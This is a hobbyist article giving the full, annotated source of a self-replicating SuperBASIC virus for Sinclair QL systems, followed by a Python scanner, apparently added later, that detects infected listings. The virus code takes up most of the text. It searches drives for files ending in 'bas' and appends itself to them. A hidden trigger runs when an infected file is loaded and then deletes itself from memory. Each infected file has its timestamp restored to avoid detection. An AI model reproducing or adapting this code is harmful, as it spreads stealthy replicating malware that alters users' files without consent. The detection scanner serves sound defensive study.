S*BASIC Virus

Not submitted for publication in September 1996 nor in December 1998 nor, as a matter of fact, in June 2oo4

After a long-lasting and generally mis-spent career as a hobby programmer, I thought I might be excused just one little virus. This offering is not much; it doesn't set out to be scary or do any damage, it merely sets out to demonstrate the principle. However, it is not difficult to see that if this sort of thing had taken off in our little world, we would have been vulnerable!

This virus requires TK2 to work, but should otherwise run on most platforms. It was written before SMSQ/E came into my life, so this particular method does not work so well for that system.

I have implemented Virus as a procedure for no other reason than packaging. Obviously, for reasons of concealment it is better to avoid any form of labeling!

32710 DEFine PROCedure V_i_r_u_s
32711 LOCal ch%(18)

First seek out a target drive. The program default is perhaps a good starting point. However, we don't know which devices the victim will have, so try them all until we find a suitable one.

32712 IF LEN(PROGD$) > 3 THEN
32713  dev$ = PROGD$
32714 ELSE : IF NOT FTEST("win1_") THEN
32715  dev$ = 'win1_'
32716 ELSE : IF NOT FTEST("flp1_") THEN
32717  dev$ = 'flp1_'
32718 ELSE : IF NOT FTEST("mdv1_") THEN
32719  dev$ = 'mdv1_': ELSE : RETurn : END IF
32720 END IF : END IF : END IF

Initialise variables. c% and n$ are required for the directory operations.

32721 c% = 0: n$ = '': virx$ = 'v_i_r_u_s'

Start descent of directory tree - not really the object of this particular discussion, so we won't go into the details here.

32722 REPeat dir_loop
32723  er = FOP_DIR(dev$ & n$)
32724  IF er >= 0: ch%(c%) = er: ELSE : EXIT dir_loop
32725  pos = -64
32726  REPeat file_loop
32727   pos = pos + 64
32728   IF pos >= FLEN(#ch%(c%)) THEN
32729    CLOSE#ch%(c%)
32730    c% = c% - 1: IF c% < 0: EXIT dir_loop
32731    pos = FPOS(#ch%(c%))
32732   ELSE
32733    GET#ch%(c%)\ pos + 14; n$

n$ now contains the name of a possible candidate. If its length = 0 then it is the name of a deleted file: Ignore and get next file name.

32734    IF LEN(n$) = 0: NEXT file_loop

Determine the type. If a directory type then traverse this branch.

32735    BGET#ch%(c%)\ pos + 5; t%
32736    IF t% = 255: GET#ch%(c%)\ pos: c% = c% + 1: EXIT file_loop

Types other than zero are unlikely to be S(uper)BASIC files, so ignore.

32737    IF t% <> 0: NEXT file_loop

Look for file names ending in bas.

32738    IF LEN(n$) < 5: NEXT file_loop
32739    IF NOT n$(LEN(n$) - 2 TO LEN(n$)) == 'bas': NEXT file_loop

Got one! Open it and check whether it already contains our virus by looking for our signature (V_i_r_u_s):

32740    er = FOPEN(dev$ & n$)
32741    IF er < 0: NEXT file_loop
32742    tc = er: er = 0
32743    GET#tc\ FLEN(#tc) - 21
32744    FOR i = 1 TO LEN(virx$): IF NOT INKEY$(#tc; -1) == virx$(i): er = 1: EXIT i
32745    IF er THEN

Ok, we have a candidate that has not yet been infected. Make a note of the date so that our update is less likely to be detected.

32746     GET#tc\ FLEN(#tc): dt = FUPDT(#tc)

Replicate!

32747     LIST#tc; 32710 TO

Append the trigger command: This is a bit tricky. We want to ensure that the virus gets activated at some point, so it is implemented here as a direct command as opposed to a program line (which may never be reached). However, in SMSQ/E at least, this means that the program can neither be EXECuted nor LRUNed: the virus is activated simply by LOADing an infected program. The victim will probably soon notice that something strange is going on here. Doing a LIST, however, will reveal nothing, as it surreptitiously removes itself from program memory after execution. Furthermore, in this implementation a switch is required (if rnd(0 to 1)) to prevent the virus from calling itself repeatedly, at the slight risk of it not getting executed about half of the time. SMSQ, which initialises variables to nul, could have a positive switch, but this virus was designed to work on all systems (running TK2). Whether it actually runs or not, dline 32710 TO will ensure that most traces of the virus will be removed from the loaded program.

32748     PRINT#tc; 'if rnd(0 to 1): V_i_r_u_s'\ 'dline 32710 to'
32749     CLOSE#tc

Obfuscate: Re-adjust the time stamp.

32750     SET_FUPDT\ dev$ & n$, dt
32751     EXIT dir_loop
32752    ELSE
32753     CLOSE#tc
32754    END IF
32755   END IF
32756  END REPeat file_loop
32757 END REPeat dir_loop

There is no real payload with this particular virus. After sex it really wants to carry out its life task. This could go here.

End game: Tidy up any open channels.

32758 REPeat close_loop
32759  IF c% < 0: EXIT close_loop
32760  CLOSE#ch%(c%): c% = c% - 1
32761 END REPeat close_loop
32762 END DEFine V_i_r_u_s
     

That's all there is to it! Mind you, this is not a particularly clever virus; so much could go wrong that this program doesn't cater for. But then that wasn't the point of the "article"!
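Seen from the defending side, the trigger command and the signature check described above leave marks in the saved file even though LIST in memory shows nothing. The following Python scanner is an added example, not part of the original article: it flags unnumbered (direct-command) lines in a saved listing, which also catches a renamed variant, plus the page's own V_i_r_u_s marker and the trailing dline. It assumes the files have been copied to a host directory as plain LF-terminated text; the sample listings and finding labels are constructed for illustration.

```python
import re
from pathlib import Path

SIGNATURE = "v_i_r_u_s"                 # marker name taken from the listing
NUMBERED = re.compile(r"^\d+\s*(.*)$")  # a stored program line: number, then statement
DEF_PROC = re.compile(r"def(ine)?\s+proc(edure)?\b")

# Constructed sample listings (LF-terminated text), not real captured files.
CLEAN = "100 PRINT 'hello'\n110 STOP\n"
INFECTED = (CLEAN
            + "32710 DEFine PROCedure V_i_r_u_s\n32762 END DEFine V_i_r_u_s\n"
            + "if rnd(0 to 1): V_i_r_u_s\ndline 32710 to\n")

def scan_bas(text):
    """Return sorted finding labels for one program listing held as text."""
    findings = set()
    for raw in text.split("\n"):
        line = raw.strip().lower()
        if not line:
            continue
        m = NUMBERED.match(line)
        if m:
            if DEF_PROC.match(m.group(1)) and SIGNATURE in m.group(1):
                findings.add("signature-procedure")
            continue
        # No line number: this runs as a direct command when the file is LOADed.
        findings.add("direct-command")
        if SIGNATURE in line:
            findings.add("signature-trigger")
        if re.match(r"dline\b", line):
            findings.add("self-delete")
    return sorted(findings)

def scan_tree(root):
    """Scan host copies of files whose names end in 'bas'; return {path: findings}."""
    hits = {}
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.name.lower().endswith("bas"):
            found = scan_bas(p.read_bytes().decode("latin-1"))
            if found:
                hits[str(p.relative_to(root))] = found
    return hits

if __name__ == "__main__":
    print(scan_bas(CLEAN), scan_bas(INFECTED))
```

The scanner looks only at file content, because the listing restores the update date after writing and a date comparison would show nothing.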


Generated with sb2htm on 2007 Feb 11
©pjwitte March 2oo1